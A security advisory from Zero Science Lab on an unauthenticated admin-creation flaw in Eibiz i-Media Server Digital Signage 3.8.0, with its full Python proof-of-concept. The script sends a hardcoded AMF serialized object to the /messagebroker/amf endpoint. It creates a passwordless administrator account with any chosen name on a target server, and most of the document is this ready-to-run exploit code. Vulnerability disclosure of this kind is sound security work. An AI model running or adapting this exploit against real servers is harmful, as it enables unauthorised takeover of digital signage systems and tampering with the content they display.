Eibiz i-Media Server Digital Signage 3.8.0 (createUser) Authentication Bypass (Add Admin)

2020-08-21T00:00:00
ID ZSL-2020-5586
Type zeroscience
Reporter Gjoko Krstic
Modified 2020-08-21T00:00:00

Description

Title: Eibiz i-Media Server Digital Signage 3.8.0 (createUser) Authentication Bypass (Add Admin)
Advisory ID: ZSL-2020-5586
Type: Local/Remote
Impact: Exposure of System Information, Exposure of Sensitive Information, Manipulation of Data
Risk: (5/5)
Release Date: 21.08.2020

Summary

EIBIZ develop advertising platform for out of home media in that time the world called "Digital Signage". Because most business customers still need get outside to get in touch which products and services. Online media alone cannot serve them right place, right time.

Description

The application suffers from unauthenticated privilege escalation and arbitrary user creation vulnerability that allows authentication bypass. Once serialized, an AMF encoded object graph may be used to persist and retrieve application state or allow two endpoints to communicate through the exchange of strongly typed data. These objects are received by the server without validation and authentication and gives the attacker the ability to create any user with any role and bypass the security control in place and modify presented data on the screen/billboard.

Vendor

EIBIZ Co.,Ltd. - <http://www.eibiz.co.th>

Affected Version

<=3.8.0

Tested On

Windows Server 2016
Windows Server 2012 R2
Windows Server 2008 R2
Apache Flex
Apache Tomcat/6.0.14
Apache-Coyote/1.1
BlazeDS Application

Vendor Status

[26.07.2020] Vulnerability discovered.
[30.07.2020] Vendor contacted.
[20.08.2020] No response from the vendor.
[21.08.2020] Public security advisory released.

PoC

imediasignage_addadmin.py

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>

References

[1] <https://www.exploit-db.com/exploits/48763>
[2] <https://packetstormsecurity.com/files/158944/Eibiz-i-Media-Server-Digital-Signage-3.8.0-Authentication-Bypass.html>
[3] <https://exchange.xforce.ibmcloud.com/vulnerabilities/187182>
[4] <https://cxsecurity.com/issue/WLB-2020080117>

Changelog

[21.08.2020] - Initial release
[19.09.2020] - Added reference [1], [2], [3] and [4]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

                                        
                                            #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Eibiz i-Media Server Digital Signage 3.8.0 (createUser) Authentication Bypass (Add Admin)
#
#
# Vendor: EIBIZ Co.,Ltd.
# Product web page: http://www.eibiz.co.th
# Affected version: &lt;=3.8.0
#
# Summary: EIBIZ develop advertising platform for out of home media in that
# time the world called "Digital Signage". Because most business customers
# still need get outside to get in touch which products and services. Online
# media alone cannot serve them right place, right time.
#
# Desc: The application suffers from unauthenticated privilege escalation and
# arbitrary user creation vulnerability that allows authentication bypass.
# Once serialized, an AMF encoded object graph may be used to persist and retrieve
# application state or allow two endpoints to communicate through the exchange
# of strongly typed data. These objects are received by the server without validation
# and authentication and gives the attacker the ability to create any user with
# any role and bypass the security control in place and modify presented data on
# the screen/billboard.
#
# =========================================================================================
#
# # python3 imedia_createUser.py 192.168.1.1 waddup
#
# --Sending serialized object...
# --Replaying...
#
# ------------------------------------------------------
# Admin user 'waddup' successfully created. No password.
# ------------------------------------------------------
#
# =========================================================================================
#
# Tested on: Windows Server 2016
#            Windows Server 2012 R2
#            Windows Server 2008 R2
#            Apache Flex
#            Apache Tomcat/6.0.14
#            Apache-Coyote/1.1
#            BlazeDS Application
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2020-5586
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5586.php
#
#
# 26.07.2020
#
#

import time as go
import requests
import sys
import re

class __CreateAdmin__:
    
    def __init__(self):
        self.ep = "/messagebroker/amf"
        self.agent = "CharlieChaplin"
        self.amfpacket = None
        self.bytecount = None
        self.bytesdata = None
        self.address = None
        self.headers = None
        self.usrname = None
        self.ende = None

    def usage(self):
        if len(sys.argv) != 3:
            self.me()
            msg = "\x20i-Media Server Digital Signage 3.8.0 Auth Bypass/Add Admin"
            brd = "-" * len(msg + "\x20")
            print("\n" + brd)
            print(msg)
            print("\x20Usage: ./i-media.py [ip] [username]")
            print(brd)
            exit(12)
        else:
            self.address = sys.argv[1]
            self.usrname = sys.argv[2]
            if not "http" in self.address:
                self.address = "http://{}".format(self.address)

    def amf(self):
        self.headers = {"User-Agent"      : self.agent,
                        "Accept"          : "*/*",
                        "Accept-Language" : "en-US,en;q=0.5",
                        "Accept-Encoding" : "gzip, deflate",
                        "Origin"          : self.address,
                        "Connection"      : "close",
                        "Referer"         : self.address + "/main.swf",
                        "Content-Type"    : "application/x-amf"}

        self.amfpacket  = b"\x00\x03\x00\x00\x00\x01\x00\x04\x6E"
        self.amfpacket += b"\x75\x6C\x6C\x00\x03\x2F\x33\x36\x00"
        self.amfpacket += b"\x00\x01\xB3\x0A\x00\x00\x00\x01\x11"
        self.amfpacket += b"\x0A\x81\x13\x4F\x66\x6C\x65\x78\x2E"
        self.amfpacket += b"\x6D\x65\x73\x73\x61\x67\x69\x6E\x67"
        self.amfpacket += b"\x2E\x6D\x65\x73\x73\x61\x67\x65\x73"
        self.amfpacket += b"\x2E\x52\x65\x6D\x6F\x74\x69\x6E\x67"
        self.amfpacket += b"\x4D\x65\x73\x73\x61\x67\x65\x0D\x73"
        self.amfpacket += b"\x6F\x75\x72\x63\x65\x13\x6F\x70\x65"
        self.amfpacket += b"\x72\x61\x74\x69\x6F\x6E\x13\x74\x69"
        self.amfpacket += b"\x6D\x65\x73\x74\x61\x6D\x70\x09\x62"
        self.amfpacket += b"\x6F\x64\x79\x11\x63\x6C\x69\x65\x6E"
        self.amfpacket += b"\x74\x49\x64\x0F\x68\x65\x61\x64\x65"
        self.amfpacket += b"\x72\x73\x15\x74\x69\x6D\x65\x54\x6F"
        self.amfpacket += b"\x4C\x69\x76\x65\x17\x64\x65\x73\x74"
        self.amfpacket += b"\x69\x6E\x61\x74\x69\x6F\x6E\x13\x6D"
        self.amfpacket += b"\x65\x73\x73\x61\x67\x65\x49\x64\x01"
        self.amfpacket += b"\x06\x15\x63\x72\x65\x61\x74\x65\x55"
        self.amfpacket += b"\x73\x65\x72\x04\x00\x09\x03\x01\x0A"
        self.amfpacket += b"\x81\x73\x1B\x64\x73\x2E\x6D\x6F\x64"
        self.amfpacket += b"\x65\x6C\x2E\x55\x73\x65\x72\x11\x70"
        self.amfpacket += b"\x61\x73\x73\x77\x6F\x72\x64\x0D\x63"
        self.amfpacket += b"\x72\x65\x61\x74\x65\x07\x74\x65\x6C"
        self.amfpacket += b"\x07\x66\x61\x78\x09\x6E\x61\x6D\x65"
        self.amfpacket += b"\x0F\x61\x64\x64\x72\x65\x73\x73\x0D"
        self.amfpacket += b"\x75\x70\x64\x61\x74\x65\x05\x69\x64"
        self.amfpacket += b"\x0D\x6D\x6F\x62\x69\x6C\x65\x0F\x75"
        self.amfpacket += b"\x44\x65\x6C\x65\x74\x65\x15\x64\x65"
        self.amfpacket += b"\x70\x61\x72\x74\x6D\x65\x6E\x74\x09"
        self.amfpacket += b"\x72\x6F\x6C\x65\x09\x72\x65\x61\x64"
        self.amfpacket += b"\x0B\x65\x6D\x61\x69\x6C\x0F\x63\x6F"
        self.amfpacket += b"\x6D\x70\x61\x6E\x79\x06\x01\x03\x06"
        self.amfpacket += b"\x01\x06\x01\x06" ##################"
        self.bytecount  = len(self.usrname * 2) + 1
        self.bytesdata  = [self.bytecount]
        self.amfpacket += "".join(map(chr, self.bytesdata))
        self.amfpacket += (bytes(self.usrname.encode("utf-8")))
        self.amfpacket += b"\x06\x01\x03\x06\x36\x06\x01\x03\x06"
        self.amfpacket += b"\x01\x06\x1B\x41\x64\x6D\x69\x6E\x69"
        self.amfpacket += b"\x73\x74\x72\x61\x74\x6F\x72\x03\x06"
        self.amfpacket += b"\x01\x06\x01\x01\x0A\x0B\x01\x15\x44"
        self.amfpacket += b"\x53\x45\x6E\x64\x70\x6F\x69\x6E\x74"
        self.amfpacket += b"\x06\x0D\x6D\x79\x2D\x61\x6D\x66\x09"
        self.amfpacket += b"\x44\x53\x49\x64\x06\x49\x39\x36\x42"
        self.amfpacket += b"\x30\x42\x46\x38\x43\x2D\x41\x31\x31"
        self.amfpacket += b"\x41\x2D\x38\x41\x32\x34\x2D\x38\x31"
        self.amfpacket += b"\x43\x31\x2D\x35\x38\x37\x45\x41\x33"
        self.amfpacket += b"\x41\x43\x41\x33\x38\x43\x01\x04\x00"
        self.amfpacket += b"\x06\x17\x75\x73\x65\x72\x53\x65\x72"
        self.amfpacket += b"\x76\x69\x63\x65\x06\x49\x39\x39\x46"
        self.amfpacket += b"\x45\x43\x43\x46\x39\x2D\x34\x41\x38"
        self.amfpacket += b"\x44\x2D\x46\x46\x34\x31\x2D\x31\x41"
        self.amfpacket += b"\x36\x36\x2D\x42\x46\x39\x31\x32\x45"
        self.amfpacket += b"\x42\x42\x44\x36\x35\x36" ##########"
        
        print("\n--Sending serialized object...")
        req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket)
        #print(req.text.encode("utf-8"))
        go.sleep(2)
        print("--Replaying...")
        req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket)
        #print(req.text.encode("utf-8"))
        self.ende = "Admin user '" + self.usrname + "' successfully created. No password."
        print
        print("-" * len(self.ende))
        print(self.ende)
        print("-" * len(self.ende))

    def me(self):
        cc = """

                          /`,.,,,.                                              
                         :.......,,                                             
                         ,.........7                                            
                         ,.........$                                            
                         ......:=+=$                                            
                        I.....,,:~,.:                                           
                       $.?7IZDDNNN~.                                            
                        $$: 8D=:I D,                                            
                         D~,7NI7DNN                                             
                         DDD   NNN:                                              
                          D8.ININ;                                              
                          D8?7DZS                                                
                          .ZDNNND D                                             
                      S..,.~8?,N OO77                                           
                    N......,..$=77:+?=~8                                        
                  :......,::=.I8?:+=.=+~++                                      
                 =.......,:+$=+O:+==~~++++=                                     
               8...........~7D$::~..~====:++                                    
              I.............:+.....~~~=~:~+?                                    
            N,............. .+...,:~=+~~ :+=$                                   
           ;....... ......, .,....,:=+:,..~=?                                   
         Z,,......  :............,::~~=...===I                                  
        =.......$   Z...... =~,,,,.,:~,...,7~=                                  
       +.......     8.....,.=~~~:.~~~=:~ ..:$==                                 
       ,......      +,..,,:.=~:~+I:,+I=8:...=?~                                 
       ,.....,      =...,,,8+=,:~=~I=~~ N...:+?                                 
       ,.,.,.8      ,..,.,?DN~+~:=+::?D   ..:=?                                 
       8......      ,...7=Z$DN:?::=I~~$  =..,=+                                 
        ...,..D   ,....O88D,8D,:=:==+??   ...,:7                                
         ,....7   ,..:$Z8D8=8DZ~~=~+==?   :..:~+                                
         ......8D .. .... :?~8D:.:~~=++    ..,~II                               
         :....~D+:   . . .  ..,..==~===N   +,.,=$                               
          ,. DDND.......... .,...,===+=N    ..,+?Z                              
          DD  88 .......... ....,..~+=~N    ..,~?I                              
                .......   ,,.,,.:...=??     8..~=I$                             
                .......   ...,,,,. ,:~=      ..:=~?                             
                ........     ,.,,..,:..      I.:+?+D                            
                .......     .......,:,,8      ,..IN                             
                ........    .,.. ..,,:.:        :8N                             
                ........     ... ..,::,,        I+O                             
                ........      ......,:,.         O.ZN                           
                ........ . .    ...,,,,.          D+                            
                ............    ....,,,.          =                             
                .......   .      ....,,,          ?                             
                .......         .....,,,          7                             
                 ......         . ..,,,,          +                             
                :.....            ..,.,,          8                             
                :.......    =.  .....,,,N         8                             
                ~.......    D.  .....,,,D         8                             
                ~.......    D.  . ...,,,O         D                             
                =....            .....,,Z         ?`                              
                +......   .  :........,.$          +                            
                I......       ........,.7          =                            
                Z........     . . ....,,7          D                            
                N..... ... .    ........I          8                            
                 ..... ... ,    ........I          8                            
                 ......  . =   ..  .....I          7                            
                 :..  .  ..7  8... .....I          ?                            
                 Z..       D  ..    ....7          N         NND88OOOOOOO88DN   
                 O..      .   ..    ....O          O      D8OZ$77II777$$ZO8DN   
                  ... .  ..   .    .....N   NNNNDDD+D888OOZ$7IIIIII7$ZO8DDN     
                   .,. ....O O..      ..88OOZZ$$777~777IIIIIIIIIIIIIII77$Z8N    
                    $..  ...88..     ..:ZZZZ$77IIII,IIIIIIIIII77777IIII7ZODN    
                     ...     ...      ,7777IIIIIIII,IIIIII77$O88OZ7III7Z8N      
                   Z..       ~7.   . ,IIIIIIIIIIIII,IIII7$O8DN NDO$77$Z8N       
                   =.. ..   . 8.    .IIIIIIIIIIIIII~I7$Z8DN    NND88DDN         
                   ...      .?,     I777IIIIIIIII7$~O8N     NNNNN               
                  8....     .I.     ...7IIIIII7$Z8DD     NNNNN                  
           NND=....~,=~  ...+I .     . ..I$$ZO8DN  NN NNNNN                     
         N.+?~.~,=~=... ... $O..   . ...~:..=IINN   $NNN                        
           ?,:..:,.=N                I.....,,=I+   N8                           
                                        ~....,8                           

        """

        j = 0
        while j &lt; len(cc):
            char = cc[j]
            sys.stdout.write(char)
            go.sleep(10.0 / 100000.0)
            j = j + 1

    def main(self):
        self.usage()
        self.amf()

if __name__ == '__main__':
    __CreateAdmin__().main()